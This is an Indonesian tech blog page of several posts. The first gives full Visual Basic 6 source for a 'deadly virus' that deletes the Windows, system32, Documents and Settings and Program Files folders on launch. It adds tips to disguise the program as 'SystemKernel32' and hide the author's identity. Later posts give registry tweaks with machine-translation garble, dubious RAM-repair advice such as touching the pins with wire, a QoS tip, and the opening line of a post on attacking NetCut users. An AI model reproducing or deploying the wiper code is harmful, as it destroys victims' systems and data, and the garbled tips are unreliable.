Social Icons

twitterfacebookgoogle pluslinkedinrss feedemail

Pages

Tampilkan postingan dengan label ilmu TKJ. Tampilkan semua postingan
Tampilkan postingan dengan label ilmu TKJ. Tampilkan semua postingan

Senin, 26 November 2012

cara membuat virus mematikan menggunakan VB



HELLO SOBAT S7 kali ini saya akan share bagaymana cara membuat virus mematikan denga menggunakan software VB , VB terkenal sebagai software pembuat software , heran kan ? sebagai software untuk membuat kembaranya sendiri(software) Vb juga mempunya kemampuan untuk membuat virus dengan kekuatan mematikan , , berikut panduan membuat virus mematikan 

yang anda perlukan antara lain adalah sebagai berikut : 
1. VB(optimal : 6.0) (cari di om google banyak ko size sekitar 300 MB)
Jika anda ingin mendownload Visual Basic 6.0, klik disini
2. Ngerti tombol2nya VB


tutorialnya :

1. buat sebuah form sekecil mungkin
2. didalam form itu, masukin nih kode

Public Sub DelAll(ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub

Private Sub Form_Load()
On Error Resume Next

If FileExist(”c:\windows\system32\katak.txt”) = True Then
End
Else
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End
End If
End Sub

Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
Else
FileExist = True
End If
End Function



3. Kode yg berwarna biru itu adalah penangkal nii virus,  jadi di folderc:\windows\system32\ kalo ada file namanya katak.txt, kamu ga bakal keserang sendiri. Bisa kamu edit semaunya . .

Yang berwarna merah itu folder yang bakal didelete ama nii virus, kamu edit sendiri aja . .
4. Bikin nih project namanya kaya nama system, disini aku memakai nama “SystemKernel32″ jadi ga bakal dicurigain.

5. jangan pernah nulis nama kamu di project ini, okey friend?

6. terakhir yaa tinggal di compile deh… 

NOTE : jangan di salah gunakan ya sobat se7en
baca selengkapnya »»  

cara mensetting REGEDIT dengan benar



HELLO SOBAT S7 kali ini saya akan share bagaimana cara meyetting regegit sobat , di dalam windowws xp dan win 7 mengedit sistem regedit sebenarnya perlu karena akan membantu kinerja laptop sobat (ngga lelet) karena banyak dari kita mengelu knp start awal win xp dan win 7 itu sangat lambat itu d karenakan sobat belom melakukan editing di sistem regedit dan masih menggenakan sistem manual , microsoft sengaja melakukan itu di karenakan tidak semua processor dapat melakukan printah secepat itu , seperti intel atom tapi jika intel atom di imbangi dengan ram 2 GB maka laptop sobat dapat melakukan printah tersebut dalam waktu yg cpt , oleh karena itu bagi yang menggunakan processor intel atom dengan ram 1 gb sebaikya jgn menggunakan cara ini saya tidak bertanggung jawab apa bila proses tambal lelet hehe 

berikut yang perlu d edit ada sangat banyak regedit yg bisa d edit tapi saya rasa yang penting penting saja yang sobat edit ^_^

1. Klik tombol Start > Run.
2. Ketik regedit dan tekan Enter setelah berada didalam jendela Run.
3. Didalam Registry Editor, pilih menu File > Export.
4. Setelah Export Registry File muncul, masukkan nama record ke bagian File Name, misalnya backup-registry dan sebagainya.
5. tekan tombol Save.
Mempercepat Update Registry
Tekan tombol Start > Log Off > Log Off.
Mengganti Wallpaper
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda pada wallpaper dan masukkan trail gambar yang diinginkan pada Value Data.
Mengganti Nama Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
Klik ganda pada choice (Default value) dan beri nama baru sesuai yang diinginkan pada Value Data.
Memunculkan Rename Pada Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Klik ganda pada Attributes > Edit Binary Value. Pada Value Data, ganti angka tersebut menjadi 0000 50 01 00 20.
Menyembunyikan Recycle Bin
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Desktop/NameSpace
Hapus subkey {645FF040-5081-101B-9F08-00AA002F954E}, kemudian Restart komputer untuk melihat hasilnya.
Untuk memunculkannya kembali, buat kembali kombinasi angka {645FF040-5081-101B-9F08-00AA002F954E}.
Menambah Isi Shortcut Menu Pada Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Klik ganda Attributes dan ganti angka di Value Data dengan angka berikut ini:
0000 50 01 00 twenty > Rename
0000 60 01 00 twenty > Delete
0000 70 01 00 twenty > Rename & Delete
0000 41 01 00 twenty > Copy
0000 42 01 00 twenty > Cut
0000 43 01 00 twenty > Copy & Cut
0000 44 01 00 twenty > Paste
0000 45 01 00 twenty > Copy & Paste
0000 46 01 00 twenty > Cut & Paste
0000 47 01 00 twenty > Cut, Copy & Paste
Menambah Isi Shortcut Menu Pada Recycle Bin Dengan Menu Pilihan
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/Shell
Klik menu Edit > New > Key dan beri nama yang diinginkan (Misalnya: Go To Windows Explorer).
Dibawah pass yang baru tersebut, tekan lagi menu Edit > New > Key dan buat sebuah pass baru bernama Command.
Klik ganda choice (Default), dan pada bagian Value Data, isi dengan trail Windows Explorer ( C:WINDOWSExplorer.exe).
Mengembalikan Folder Documents Yang Hilang Di My Computer
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/DocFolderPaths
Pilih menu Edit > New > String Value dan beri nama sesuai dengan username yang digunakan di Windows (contohnya: Chippers)
Klik ganda pada worth tersebut dan masukkan trail tempat dimana Documents anda berada (contohnya D:Documents)
Menyingkirkan File Stored Dari My Computer
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/MyComputer/NameSpace/DelegateFolders
Hapus subkey {59031a47-3f72-44a7-89c5-5595fe6b30ee} dengan menekan tombol Del.
Menyembunyikan My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoRecentDocsMenu.
Kemudian klik ganda pada DWORD Value tersebut, dan berikan angka 1 untuk mengaktifkannya.
Menyembunyikan Menu Find
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoFind.
Kemudian klik ganda pada DWORD Value tersebut dan berikan angka 1 untuk mengaktifkannya. Restart komputer.
Menyembunyikan Help And Support
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buatlah sebuah DWORD Value baru – Menu Edit > New > DWORD Value, dan beri nama NoSMHelp.
Kemudian klik ganda pada NoSMHelp dan isi dengan angka 1 pada Value Data. Restart komputer.
Menyembunyikan Menu Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoRun. Klik ganda dan masukkan angka 1 sebagai Value Data.
Menyembunyikan Menu Run Dari Start Menu (2)
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Cari worth bernama Start_ShowRun, klik ganda dan masukkan angka 0 pada bagian Value Data.
Menyembunyikan Log Off
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > Binary Value dan beri nama NoLogOff.
Klik ganda pada NoLogOff dan masukkan angka 01 00 00 00 pada bagian Value Data.
Menyembunyikan Menu Turn Off Computer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik menu Edit > New > DWORD Value dan beri nama NoClose.
Klik ganda NoClose dan beri angka 1 pada Value Data.
Cleartype Pada Logon Screen
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda FontSmoothingType dan masukkan angka 2 pada Value Data.
Membuat Tampilan Berbeda Pada Jendela Logon
HKEY_USERS/.DEFAULT/Software/Microsoft/Windows/CurrentVersion/ThemeManager
Klik ganda ColorName dan masukkan teks Metallic pada Value Data.
Menampilkan Administrator Di Welcome Screen
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t
Buat sebuah DWORD Value baru dan beri nama Administrator.
Klik ganda Administrator dan masukkan angka 1 pada Value Data.
Login Otomatis
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon
Klik ganda AltDefaultUserName dan masukkan username comment yang dipilih.
Klik ganda AutoAdminLogon dan masukkan angka 1 pada Value Data.
Buat sebuah DWORD Value baru dan beri nama DefaultPassword.
Klik ganda DefaultPassword dan masukkan cue comment yang dipilih pada Value Data.
Menyembunyikan Ikon Printer & Faxes dari Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Cari worth bernama Start_ShowPrinters dan berikan angka 0 pada Value Data.
Menyembunyikan Control Panel Dari Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Cari worth bernama Start_ShowControlPanel dan klik ganda pada bagian tersebut.
Masukkan angka 0 pada Value Data.
Menyembunyikan Menu My Pictures Dari Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_ShowMyPics dan masukkan angka 0 pada bagian Value Data.
Memunculkan Menu Administrative Tools
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada StartMenuAdminTools dan berikan angka 1 pada Value Data.
Memperkecil Ikon Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_LargeMFUIcons dan masukkan angka 1 pada Value Data.
Menghilangkan Username Pada Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesExplorer
Pilih Edit > New > DWORD Value dan beri nama NoUserNameInStartMenu.
Klik ganda NoUserNameInStartMenu dan masukkan angka 1 pada Value Data.
Mencegah Perubahan Menu Start
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoChangeStartMenu.
Klik ganda NoChangeStartMenu dan masukkan angka 1 pada Value Data.
Menyembunyikan My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada Start_ShowRecentDocs dan masukkan angka 0 pada Value Data.
Mengubah Nama Default Shortcut Penting Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/CLSID
Klik ganda pada default worth pada masing-masing subkey dibawah ini:
My Network Places:
{208D2C60-3AEA-1069-A2D7-08002B30309D}
My Computer:
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Documents:
{450D8FBA-AD25-11D0-98A8-0800361B1103}
Recycle Bin:
{645FF040-5081-101B-9F08-00AA002F954E}
Default IE Icon:
{871C5380-42A0-1069-A2EA-08002B30309D}
masukkan nama-nama unik sebagai pengganti nama defaultnya.
Menyembunyikan Ikon Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada HideIcons dan masukkan angka 1 pada Value Data.
Membersihkan Semua Ikon Pada Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoDesktop.
Klik ganda pada NoDesktop dan masukkan angka 1 pada Value Data.
Membuat Desktop Lebih Stabil
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer
Buat sebuah DWORD Value baru dan beri nama DesktopProcess.
Klik ganda DesktopProcess dan masukkan angka 1 pada Value Data.
..
Menghapus Daftar Program Dalam Menu Run
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU
Di jendela sebelah kanan, akan terlihat deretan software-software (ditandai secara alphabet a, b, c, d, dan seterusnya).
Untuk menghapusnya, cukup dengan memilih salah satu (atau semua) nama module yang ada dan tekan tombol Del.
Jika muncul jendela konfirmasi untuk penghapusan data, tekan Yes.
Membersihkan Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoRecentDocsHistory.
Klik ganda pada NoRecentDocsHistory dan masukkan angka 1 pada bagian Value Data.
Menghilangkan Info Tip Pada Ikon Folders Di Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada FolderContentsInfoTip dengan angka 0.
Mengunci Taskbar
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Klik ganda pada TaskBarSizeMove dan masukkan angka 0 pada Value Data.
Menghapus Past Items Icons Pada Taskbar
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerTrayNotify
Hapus IconStreams dan PastIconsStream, kemudian buka Task Manager, pada Tab Processes klik kanan pada explorer.exe dan pilih End Process.
Klik menu File > New Task (Run) dan ketikan kembali path-finder dan tekan OK.
Menyembunyikan System Tray
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurr entVersionPoliciesExplorer
Jika pass Explorer belum ada buatlah sebuah DWORD Value baru dan beri nama NoTrayItemsDisplay.
Klik ganda NoTrayItemsDisplay dan masukkan angka 1 pada Value Data.
Untuk mengembalikan System Tray masukkan angka 0 pada Value Data.
Menonaktifkan Klik-kanan Pada Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoViewContextMenu.
Klik ganda pada NoViewContextMenu dan masukkan angka 1 pada Value Data.
Mengubah Waktu Delay Ketika Membuka Menu
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda pada MenuShowDelay dan ubah angka milidetik yang semula 400 menjadi angka lain. Semakin kecil semakin cepat.
Mengatur Ukuran Ikon Di Desktop Dan Start Menu
HKEY_CURRENT_USER/Control Panel/Desktop/WindowMetrics
Klik ganda pada Shell Icon Size dan ubah angka 32 menjadi angka lainnya, misalnya 10.
Mengganti Warna Windows
HKEY_CURRENT_USER/Control Panel/Colors
Klik ganda Window dan masukkan kombinasi warna RGB (gunakan Adobe PhotoShop untuk menemukan kombinasi warna yang sesuai).
Mengganti Warna Teks Dalam Windows
HKEY_CURRENT_USER/Control Panel/Colors
Klik ganda WindowText dan masukkan kombinasi warna RGB.
Menghilangkan Tab Screen Saver
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/System
Buat sebuah DWORD Value baru dan beri nama NoDispScrSavPage.
Klik ganda NoDispScrSavPage dan masukkan angka 1 pada Value Data.
Mengganti Screen Saver Lewat Registry
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda SCRNSAVE.EXE kemudian masukkan trail tempat record Screen Saver yang diinginkan.
Contoh: C:WINDOWSScreenSaver.scr
Menonaktifkan Default Screen Saver
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda ScreenSaveActive dan masukkan angka 0 pada Value Data.
Untuk mengembalikannya masukkan angka 1 pada Value Data.
Menghilangkan Tanda Anak Panah Pada Ikon Shortcut
HKEY_CLASSES_ROOT/Inkfile
HKEY_CLASSES_ROOT/piffile
Ubah nama IsShortcut menjadi IsShortcuts.
Mengubah Style Wallpaper
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda pada WallpaperStyle dan masukkan angka sebagai berikut di Value Data:
1 > Center
2 > Stretch
3 > Tile
Menonaktifkan Peringatan Low Disk Space
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/PoliciesExplorer
Buatlah sebuah DWORD Value baru dan beri nama NoLowDiskSpaceChecks.
Klik ganda NoLowDiskSpaceChecks dan masukkan angka 1 pada Value Data.
Menonaktifkan Menu Properties My Computer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoPropertiesMyComputer.
Klik ganda NoPropertiesMyComputer dan masukkan angka 1 pada Value Data.
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoPropertiesMyComputer.
Klik ganda NoPropertiesMyComputer dan masukkan angka 1 pada Value Data.
Jika pass Explorer tidak ada, buat yang baru dengan mengklik menu Edit > New > Key dan beri nama Explorer.
Mengubah Ukuran CoolSwitch
(Coba Tekan Alt+Tab, itulah yang disebut dengan CoolSwitch)
HKEY_CURRENT_USER/Control Panel/Desktop
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik CoolSwitchColumns dan aturlah seberapa panjang CoolSwitch ini akan ditampilkan dengan memasukkan angka yang diinginkan pada Value Data.
Kemudian klik CoolSwitchRows dan lakukan hal yang serupa.
Menonaktifkan Fungsi CoolSwitch
HKEY_CURRENT_USER/Control Panel/Desktop
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Klik ganda pada CoolSwitch dan masukkan angka 0.
Menonaktifkan Animasi Pada Windows XP
HKEY_CURRENT_USER/Control Panel/Desktop/WindowMetrics
Klik ganda pada MinAnimate dan masukkan angka 1 untuk menonaktifkan, dan 0 untuk mengaktifkannya kembali.
Mengubah Tombol Kiri Menjadi Tombol Kanan Pada Mouse
HKEY_CURRENT_USER/Control Panel/Mouse
Klik ganda pada SwapMouseButtons dan beri angka 1 pada Value Data.
Mengubah Gulungan Baris Pada Scroll Mouse
HKEY_CURRENT_USER/Control Panel/Desktop
Klik ganda WheelScrollLines masukkan angka yang diinginkan (sesuai dengan baris yang hendak digulung) pada Value Data.
Menyembunyikan System Properties Pada Control Panel
HKEY_CURRENT_USER/Control Panel/don’t load
Buatlah sebuah String Value baru dan beri nama sysdm.cpl.
Klik ganda sysdm.cpl dan masukkan submit Yes pada bagian Value Data.
Menonaktifkan Display Properties
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies
Pada bagian subkey Policies, buat sebuah pass baru dengan cara Edit > New > Key dan beri nama System.
Kemudian di subkey System, buatlah sebuah DWORD Value baru dan beri nama NoDispCPL.
Klik ganda NoDispCPL dan masukkan angka 1 pada Value Data.
Mengatur Kecepatan Repeat Rate Keyboard
HKEY_CURRENT_USER/Control Panel/Keyboard
Klik ganda KeyboardSpeed dan masukkan nilai yang diinginkan. Semakin tinggi angkanya, semakin cepat pula Repeat Rate-nya.
Teks Bergaris Bawah Pada Notepad
HKEY_CURRENT_USER/Software/Microsoft/Notepad
Klik ganda lfUnderline dan masukkan angka 1 pada Value Data.
Mode Word Wrap Pada Notepad
HKEY_CURRENT_USER/Software/Microsoft/Notepad
Klik ganda fWrap dan masukkan angka 1 pada Value Data.
Status Bar Pada Notepad
HKEY_CURRENT_USER/Software/Microsoft/Notepad
Klik ganda StatusBar dan masukkan angka 1 pada Value Data.
DVD Di Windows Media Player
HKEY_CURRENT_USER/Software/Microsoft/MediaPlayer/Player/Settings
Pilih menu Edit > New > String Value dan beri nama DVDUI.
Klik ganda DVDUI dan masukkan teks Yes pada Value Data.
Menambah Identitas Windows Media Player
HKEY_CURRENT_USER/Software/Policies/Microsoft
HKEY_LOCAL_MACHINE/SOFTWARE/Policies/Microsoft/Windows
Klik Edit > New > Key dan beri nama WindowsMediaPlayer.
Klik Edit > New > String Value dan beri nama TitleBar.
Klik ganda TitleBar dan masukkan teks yang diinginkan pada Value Data.
Mengubah Tombol Stop Menjadi Tombol Play Pada Windows Media Player
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/MediaPlayer/Objects/StopButton
Klik ganda onclick dan masukkan teks player.controls.play() pada Value Data.
Memilih Pemutar CD Audio Default
HKEY_CLASSES_ROOT/AudioCD/Shell/Play/Command
Klik ganda (Default) dan masukkan trail module yang anda inginkan sebagai pemutar CD Audio secara default.
Misalnya: C:Program FilesWindows Media Playerwmplayer.exe
Mengembalikan Akses Ke CD-ROM
Setelah menguninstall sebuah module pembakar CD, adakalanya CD-ROM tidak bisa lagi diakses, solusinya:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lClass{4D36E965-E325-11CE-BFC1-08002BE10318}
Hapus subkey LowerFilters dan UpperFilters dengan menekan tombol Del.
Memperkecil Ukuran Thumbnail Untuk Windows Explorer
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer
Pilih menu Edit > New > Binary Value dan beri nama ThumbnailSize.
Klik ganda ThumbnailSize dan masukkan angka twenty pada Value Data.
Membuat Shortcut Menu Pribadi Di Windows Explorer
HKEY_CLASSES_ROOT/Drive/Shell
Pilih Edit > New > Key dan beri nama Winamp sebagai contohnya.
Klik ganda choice (Default) disisi kanan registry editor dan masukkan teks Winamp.
Klik subkey Winamp dan pilih menu Edit > New > Key dan beri nama Command.
Klik ganda choice (Default) dan masukkan trail C:Program FilesWinampWinamp.exe pada Value Data.
Enkripsi Melalui Menu Konteks
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Buat sebuah DWORD Value baru dan beri nama EncryptionContextMenu.
Klik ganda EncryptionContextMenu dan masukkan angka 1 pada Value Data.
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionExplorer
Jika belum ada, pilih Edit > New > Key dan beri nama sesuai dengan expostulate yang diinginkan [contohnya: C untuk expostulate C:]
Pada worth tersebut, buat sebuah Key baru lagi dan beri nama DefaultIcon.
Klik ganda choice (Default) dan masukkan trail tempat ikon berada (contohnya: D:DocumentsC Drive Icon.ico).
Artikel sumber : Poeds.luragung.com
baca selengkapnya »»  

Senin, 14 Mei 2012

masalah RAM dan cara mengatasinya


HELLO SOBAT s7 kali ini saya akan share permasalahan yang sering terjadi di RAM, atau Random Access Memory atau lebih dikenal sebagai memory, merupakan satu hardware yang penting dalam sistem komputer.Pernah dengar suatu kalimat berbunyi “semakin besar RAM, semakin cepat kinerja komputer ”  Kalimat ini sedikit bayak benar, karana RAM memainkan peranan untuk membantu CPU dalam melaksanakan proses/task pada sesuatu sistem ko...mputer. Tapi RAM tinggi tanpa dukungan Processor juga jadi masalah tersendiri. misalnya Processor P3 kasih ram 3GB, kan komputernya jadis ering hang. ha...ha..

Oke kita lanjutin aja bro..
Berikut ini merupakan jenis-jenis RAM
- SRAM (Static RAM), - DRAM (Dynamic RAM) - SDRAM (Synchronous Dynamic RAM) - DDR SDRAM (Double Data Rate SDRAM), - RD RAM (Rambus) , - DDR2 SDRAM (Double Data Rate Two SDRAM) serta - Rambus XDR DRAM (eXtreme Data Rate DRAM), saat ini malah sudah DDR3. ngak tahu kedepannya bagaimana?

Perbedaan DDR dan DDR2
# Memori DDR biasanya biasa ditemui pada kecepatan 266/333/400 Mhz sedangkan DDR2 pada kecepatan 400/533/667/800 Mhz.
# DDR2 mengkonsumsi daya lebiah rendah (1,8 volt) daripada DDR (2,5 volt).
# Modul DDR memiliki jumlah kaki 184 pin sedangkan DDR2 berjumlah 240 pin.
# CAS Latency (CL –waktu tunggu dalam mengirimkan data) pada DDR biasanya berkisar pada angka 2,2,5 atau 3. pada DDR2 biasanya berupa angka 3,4 atau 5 clock. Namun pada DDR2 bisa terdapat pula Additional latency (AL) mulai 0,1,2,3,4 atau 5 clock. Jadi pada DDR 2 dengan CL4 dan CL1 akan memilki angka latency sebesar 5.
# Controller internal pada DDR mengerjakan 2-bit data dari storage sedangkan DDR2daat mengerjakan 4-bit sekaligus.
Memori DDR2 telah didukung oleh motherboard High-end. Kita mengcompile di bawah suatu daftar yang pendek dengan perbedaan-perbedaan utama antara memori-memori DDR2 dan DDR.
Kenapa ngak nyinggung tentang SD-RAM, sudah basi bro maklum digunakan untuk P3 kebawah.

PENYEBAB KERUSAKAN RAM
Ada banyak hal yang menyebabkan, diantaranya adalah :

"Kerusakan" fisik". mungkin jatuh atau kena benturan atau kena air hujan (mungkin atapnya bocor )Untuk mengatasinya Anda harus memeriksa kondisi fisik RAM tersebut. Buka casing komputer Anda, lalu cabut RAM tersebut. Bersihkan apabila RAM dan socketnya kotor. Periksa juga apakah ada karat.
SOAK, apaan tuh?. saya pakai istilah orang elektro. soak artinya sudah lama dipakai, sudah dapat masanya mau rusak. mengatasinya ganti yang baru
Penggunaan VGA card on board. VGA card onboar biasanya mengambil atau memanfaatkan RAM yang ada sehingga kerja ram menjadi lebih berat, tentu saja jadi sepat rusak.
Terdapat driver atau program yang dijalankan dari config.sys atau autoexec.bat yang bekerja menggunakan RAM. Solusinya : Edit file autoexec.bat dan config.sys dengan menggunakan Notepad. Lalu editlah pada baris yang "mencurigakan" atau yang kira-kira digunakan untuk me-load program. Bila ketemu tambahkan kata REM (tetapi bila Anda menambahkan kata REM maka program tersebut tidak akan di-load/dijalankan). Bila Anda memakai driver CD-ROM 4x dari Teac, ubahlahparameter xmssize= -1 pada autoexec.bat menjadi xmssize=0.
Virtual device driver dijalankan dari system.ini. Untuk mengatasinya buka system ini dengan cara klik Start - Run - ketikkan sysedit. Pilih system.ini. Lalu editlah pada baris yang kira-kira digunakan untuk meload virtual device driver.
Kesalahan pada CMOS setting. Pada beberapa komputer terdapat feature Memory Hole at 16 Mb atau Hold to 15 Mb RAM. Jika feature tersebut di enable maka jika Anda memiliki RAM yang lebih besar dari 15 Mb atau 16 Mb, Windows tetap akan mendeteksi sebesar 15 Mb atau 16 Mb. Untuk mengatasi hal ini, silakan di disable feature tersebut. maklum ini untuk RA jenis lama.
dan penyebab lainnya.

TANDA-TANDA RAM RUSAK ATAU BERMASALAH
1. Blue Screen of Death selama proses instalasi Windows XP. Ini adalah salah satu tanda paling pasti bahwa salah satu kecurigaan merujuk pada memori yang rusak. maksudnya disini ketika kita menghidupkan komputer layar komputer berwarna biru lalu restart demikian kejadiannya berulang-ulang.
2.Blue Screen kemudian ada tulisan text. lalu komputer diam, layar tetap berwarna biru.
3. komputer restart terus menerus.
4. Ketika komputer dihidupkan terdengar bunyi beep panjang berulang ulang, pada layar tidak ada tampilan.
5. dan beberapa kejadian lain

CARA MENGATASINYA
1. Apabila muncul Blue Screen, komputer restart terus menerus, terdengar bunyi beep panjang terus menerus, maka buka casing komputer, cabut RAMnya (sayang saya tidak bisa memasukan gambar RAM disini). selanjuntya bersikan ram menggunakan kain atau kuas, lalu pasang kembali. seharusnya oke bro.

Tapi gimana kalau belum oke juga, coba ambil benda logam atau kawat, cabut lagi ramnya lalu pada kaki pin-pinnya kontakkan dengan kawat tersebut. lakukan pemukulan secara perlahan pada tangan anda. maksudnya ramnya dipukul perlahan ketangan anda beberapa kali. tujuannya untuk membuang tegangannya.

baca selengkapnya »»  

Rabu, 09 Mei 2012

cara mempercepat browsing

Tips Mempercepat Browsing dengan Mematikan QoS Packet Scheduler Image 
HELLO SOBAT cyber kali ini saya akan share bagaimana cara agar Pada saat kita melakukan browsing internet lebih cepat , sering kita merasa sebel karena koneksi internet yang kita pakai terasa lambat, terlebih lagi kebutuhan tersebut bersifat mendesak untuk menyelesaikan tugas yang harus anda kerjakan. Trik ini memang tidak akan melipat gandakan kecepatan dari koneksi internet, tetapi setidaknya ini akan sedikit mempercepat koneski internet yang kita pakai.
Pada tips kali ini, kita akan mencoba mematikan salah satu  pada Windows yang secara umum tidak dipergunakan untuk kebutuhan umum yaitu QoS Packet Scheduler. QoS merupakan kependekan dari Quality of Service, disediakan system operasi windows dengan tujuan untuk memastikan jaringan dapat berjalan dengan lancarTetapi pada implementasinya paket ini memakan resource dari bandwidth anda sampai dengan 20%, sehingga bandwith anda sbesar itu akan terbuang sia-sia oleh QoS Packet Schduler.
Jika koneksi internet yang anda pakai memang sangat lambat, ini bukanlah solusi utama untuk mengatasi masalah. Anda harus menghubungi pihak Administrator jaringan yang mengurusi koneksi di tempat anda atau menghubungi pihak Internet Service Provider langganan anda untuk meningkatkan bandwidth yang lebih baik. Tentunya, anda harus mengupgrade layanan yang anda pakai.
Langkah-langkah untuk mematikan QoS pada Windows XP adalah sebagai berikut :
  • Login sebagai Administrator atau user yang setingkat dengan Administrator pada saat baru masuk Windows
  • Klik Start, Control Panel dan klik Network Connections
  • Klik kanan jenis koneksi yang anda gunakan, kemudian klik Properties (Ini bagian yang penting, jadi jangan salah untuk memilih koneski yang anda pakai)
    Tips Mempercepat Browsing dengan Mematikan QoS Packet Scheduler Image
  • Setelah keluar jendela baru, hilangkan tanda check pada bagian QoS Packet Scheduler
    Tips Mempercepat Browsing dengan Mematikan QoS Packet Scheduler Image
  • Kemudian klik OK dan tutup semua jendela yang telah anda buka sebelumnya
Untuk versi Windows yang lain, mungkin akan berbeda langkah-langkah kerjanya. Tetapi intinya, anda harus menemukan konfigurasi yang anda pakai untuk koneksi internet dan mematikan QoS Packet Scheduler. Apabila anda masih kesulitan untuk mematikan QoS Packet Scheduler di komputer yang anda pakai, silahkan tinggalkan komentar di postingan ini, kami akan coba membantu mencari solusinya. Selamat mencoba dan semoga berhasil!

baca selengkapnya »»  

cara menyerang balik pengguna netcut

HELLO SOBAT s7 kali ini saya akan share cara menyerang balik seorang pengguna netcut, tentunya sobat sangat tidak senang jika ada seseorang yang menggunakan netcut untuk memutus koneksi sobat mau itu dari wirelles ataupun menggunakan LAN , oleh karena itu saya akan share cara menyerang balik pengguna netcut tersebuy , baca baik-baik ya berikut

Cek ARP untuk mengetahui apakah ada orang yang memakai NetCut.
